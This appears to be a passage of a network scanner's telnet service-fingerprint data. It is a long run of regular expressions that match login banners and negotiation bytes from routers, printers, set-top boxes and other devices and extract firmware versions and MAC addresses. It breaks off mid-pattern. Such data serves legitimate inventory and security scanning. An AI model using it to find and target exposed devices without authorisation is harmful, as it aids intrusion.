+\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, 